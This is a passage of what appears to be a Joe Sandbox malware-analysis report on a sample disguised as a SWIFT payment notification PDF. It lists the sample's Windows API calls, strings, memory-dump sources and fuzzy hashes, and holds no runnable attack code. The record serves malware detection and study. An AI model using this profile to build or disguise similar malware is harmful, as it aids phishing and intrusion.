                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                              • String ID: ThumbnailClass
                                                                                                                              • API String ID: 3725905772-1241985126
                                                                                                                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 769691225-438819550
                                                                                                                              • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                              • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                              • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                              • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                              • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                              • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize
                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                              • API String ID: 1482215665-1287834457
                                                                                                                              • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                                                                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                              • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                                                                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00433A26
                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00433A4E
                                                                                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                              • API String ID: 2179348866-1459072770
                                                                                                                              • Opcode ID: f82eb31804b3023e2553202f2e02abe34422324a36a699aca362e62b71e5605a
                                                                                                                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                              • Opcode Fuzzy Hash: f82eb31804b3023e2553202f2e02abe34422324a36a699aca362e62b71e5605a
                                                                                                                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                              • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                              • API String ID: 2483343779-2107944366
                                                                                                                              • Opcode ID: dff1bbe2fe2954a5c006d25a5380b71d9722c391f2a6262120ea3a0734c92a6c
                                                                                                                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                              • Opcode Fuzzy Hash: dff1bbe2fe2954a5c006d25a5380b71d9722c391f2a6262120ea3a0734c92a6c
                                                                                                                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,00000001,004115F6,00000000), ref: 004188A0
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004188EC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                                                              • String ID: ...$<program name unknown>$@hI$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $rhI
                                                                                                                              • API String ID: 3784150691-1152812861
                                                                                                                              • Opcode ID: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
                                                                                                                              • Instruction ID: 113ef7f6135713692ed5abadedb2fb4a004c8e957f1eafa3cbe622dd24e59533
                                                                                                                              • Opcode Fuzzy Hash: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
                                                                                                                              • Instruction Fuzzy Hash: 08413672A002257ADB117779AC45BFF36EC9B05708F51447FF90492282EF2C8E8182AD
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                              • GetParent.USER32 ref: 00469C98
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                              • GetParent.USER32 ref: 00469CBC
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1383977212-1403004172
                                                                                                                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                                                                              • GetParent.USER32 ref: 00469E96
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                                                                              • GetParent.USER32 ref: 00469EBA
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1383977212-1403004172
                                                                                                                              • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                              • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                                                                              • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                              • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                                                                              APIs
                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$Data$Access$Unaccess$Vartype
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 707535999-0
                                                                                                                              • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                                                                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                              • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                                                                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 312131281-0
                                                                                                                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                              • SendMessageW.USER32(766E05F0,00001001,00000000,?), ref: 00448E16
                                                                                                                              • SendMessageW.USER32(766E05F0,00001026,00000000,?), ref: 00448E25
                                                                                                                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3771399671-0
                                                                                                                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                              • String ID:
